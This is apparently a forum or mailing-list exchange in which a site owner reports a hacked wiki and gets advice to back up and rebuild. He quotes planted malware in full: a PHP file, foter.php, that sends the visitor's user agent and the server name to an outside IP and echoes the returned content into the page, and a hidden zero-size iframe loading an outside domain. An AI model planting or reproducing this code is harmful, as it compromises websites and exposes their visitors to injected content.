Tim Ware wrote:
I notice several files that seem to have modified at the docroot level:
foter.php (never noticed this one before) with this content:
<?php $ip = '209.62.27.83'; $port = '80'; $path = '/linkr/get/'; $fp = fsockopen($ip, $port, $errno, $errstr, 30); if (!$fp) { echo ''; } else { $post = "u = ".rawurlencode ($ _SERVER['HTTP_USER_AGENT'])."&h=".rawurlencode($_SERVER['SERVER_NAME']); $out = "POST ".$path." HTTP/1.0\r\n"; $out .= "Host: ".$ip.":".$port."\r\n"; $out .= "Content-Type: text/html\r\n"; $out .= "Content-Length: ".strlen($post)."\r\n"; $out .= "Connection: Close\r\n"; $out .= "\r\n"; $out .= $post; fwrite($fp, $out); $resp = ''; while (!feof($fp)) { $resp .= fgets($fp, 128); } fclose($fp); $paths = split("\r\n\r\n", $resp); echo $paths[1]; } ?>
and this "m-analytics" code was added to an old index page and a google verification page:
<iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a " width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Same thing happened to another wiki on this site, where the m- analytics iframe was added. I *did not* add this, so I suspect foul play.
Thoughts?
Tim
Backup everything and start from scratch. The only files from the wiki you should need to keep are the uploads. Remember to verify there aren't scripts there.